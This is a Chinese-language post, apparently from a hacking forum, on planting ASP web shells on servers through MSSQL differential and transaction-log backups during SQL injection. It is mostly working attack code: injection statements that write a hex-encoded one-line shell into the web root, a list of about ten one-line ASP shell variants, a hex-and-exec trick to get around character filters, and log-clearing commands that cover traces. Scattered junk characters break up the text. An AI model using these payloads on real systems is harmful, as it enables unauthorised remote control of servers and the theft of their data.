MSsql差异备份总结

admin

差异备份的流程大概这样：
' Z2 a, {. i! Q) T, Z1 v1 Y1.完整备份一次(保存位置当然可以改)
+ b5 I# h8 m: |" z( Cbackup database 库名 to disk = 'c:\ddd.bak';--

; p& R1 W* ~, D" [2.创建表并插曲入数据
create table [dbo].[dtest] ([cmd] [image]);
' y( v$ E0 {& F- |& binsert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--

3.进行差异备份
) ~7 r* c' O) y. Q+ m5 Wbackup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
3 c; y* M: Q" U$ I$ N8 e0 f9 r& v
+ P8 M( z% X8 I, Z1 a3 Z& i上面
8 Y9 i; h5 Q" B/ o2 W& N0x3C25657865637574652872657175657374282261222929253E
就是一句话木马的内容：<%execute(request("a"))%>
& l. f5 y0 ?% ^( ?$ J# @; L8 V8 M
4 s; k/ J) T7 D! G' Q7 a+ T如下是网上常见的差异备份代码，思路一样！
===================================================
利用差异备份提高提高backupwebshell的成功率,减少文件大小
步骤:

3 ]& e9 G$ G5 ?* ^! W  Adeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库

create table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表

6 S& t, I5 w4 u0 p( b! X
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中
& Y# T+ u8 b# x
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份
( G, w& v; Q& V" r1 U
drop table [xiaolu]  -- 删除此表。
' }) L/ ]3 x) t
0x77006F006B0061006F002E00620061006B00为wokao.bak
! D$ V0 [/ C1 K3 H0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
2 K6 V# s6 O# a0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp
5 x5 a- H+ E  l+ h
声明：方法不是我想的，我只是写工具，默认得到shell是
) ]6 k! w  z9 [. a( B4 M( z# C" ^1 v/ s<%execute(request("a"))%>
===============================================================

( o7 v& L* N, v, W2 E- u! n- S我发现上面代码，有时会无效，而直接用

backup database 库名 to disk = 'c:\ddd.bak'

create table [dbo].[dtest] ([cmd] [image]);
4 ]& Y# ]9 v. k  V* o
$ Z3 d! C* d: _" Q/ Dinsert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)

# d% x; S7 [5 q  B! T. S, b0 fbackup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--

却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！
+ Z, c0 i- H; O: s) I
库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！
& C/ O  o% J  d7 l  z/ v
4 d9 z& F+ \6 U: R" M% `网上还有log增量备份的，我也把他记录一下
=====================================================
; T; S9 t$ g. \1 f# }另一种log增量备份技术:

';alter database null set RECOVERY FULL--
# P1 Y. x# i; ]6 F8 B3 k' L
  w, a3 |. \. J  ?! m4 u/ N% B) y';create table cmd (a image)--
5 Z, D- K4 \- }" I( M0 c9 h# N
';backup log null to disk = 'f:\cmd' with init--
. U" a- z/ j7 L3 K2 V- _( S
! Z% H* Q4 v3 o) \, v# [; }- ]';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
4 x5 x0 G  |6 ^6 X7 Y, I
3 u( H2 F: E* `8 G2 V1 @';backup log null to disk = '备份路径'--
9 P3 Z6 U- ?! k" ]7 s4 T+ @4 V
% o, a0 R, Y" K  k';drop table cmd--
7 V# L! }; L4 C# H4 q
. O6 B9 j7 ?) u/ A';alter database XXX set RECOVERY SIMPLE--
, @  \% z0 a! _# R/ m2 W) _( K' r
PS:0x3C2565786563757465287265717565737428226122292
9253EDA 是一句话小马16进制转来的
+ F9 G/ H3 \. h3 J
说到一句话马，还可以有这么几种写法：
; k  @' }, ], P. A$ p6 C
5 o) J2 n6 z1 C1 s) V7 Za)<%%25Execute(request("a"))%%25>
. t8 h: L5 c6 A% y. k8 ?b)<%Execute(request("a"))%>
# b2 D  r! F6 p, U6 v# S+ P% n+ k% Kc)%><%execute request("a")%><%
d)<script language=VBScript runat=server>execute request("a")</script>
0 Y3 \% P. l3 A9 u0 y9 d* U5 {e)<%25Execute(request("a"))%25>
8 x/ _8 Y- n3 Y5 W2 d2 Qf)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
0 Y0 x3 j" t* {( c; L* U* |g)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
, E" E% X* O. M% Y$ `* ]h)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
$ K6 i" _+ t& D# P( QI)<%eval request(0)%>
" R( {- v) r/ }& E* \: F) DJ)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话

- O+ G4 s( H2 N4 Q- Z# c. u. i' X=============================================

- m. x4 ?5 \4 k, {( y  l当遇到差备过滤了/时用这个语句代替

declare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--

3 o: R; n/ Y. q: }; l- A把要执行的语句转16进制然后用exec执行

( V* e8 K6 G+ `( P, S
# p5 Z1 R( D0 S9 ^/ k减少备份文件大小方法如下:
  E# g; T. j9 p
' {; V5 f$ i( C/ C. C0 R1 a) D& F, I( Z总的来说就是那么简单几句,下面以备份数据库model为例子
1
$ @4 D2 j) D) E' r4 Kid=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
- X0 K2 p* g( t" s1 Z$ a: @- I. U! F" S2
5 N0 S; k( t4 ^: A. C/ p- [2 Yid=1;backup database model to disk='你的路径‘ with differential,format;--
4 u) P( a4 Y' v. n: d
' f  h9 _/ p  ^# `4 i% ?

SQL语句清理日志
( e1 e7 B7 J! ~; ^: s注：test为数据库名

--清空日志
DUMP TRANSACTION test WITH NO_LOG

--截断事务日志
* _; i8 k7 K8 |7 bBACKUP LOG test WITH NO_LOG
: |& x( i( q. `* V
--收缩数据库
DBCC SHRINKDATABASE(test)

--收缩指定数据文件,1是文件号,可以通过这个语句查询到
Select * from sysfiles DBCC SHRINKFILE(1)

--以后能自动收缩
4 a( E/ \4 t9 g  u# {EXEC sp_dboption 'test', 'autoshrink', 'TRUE'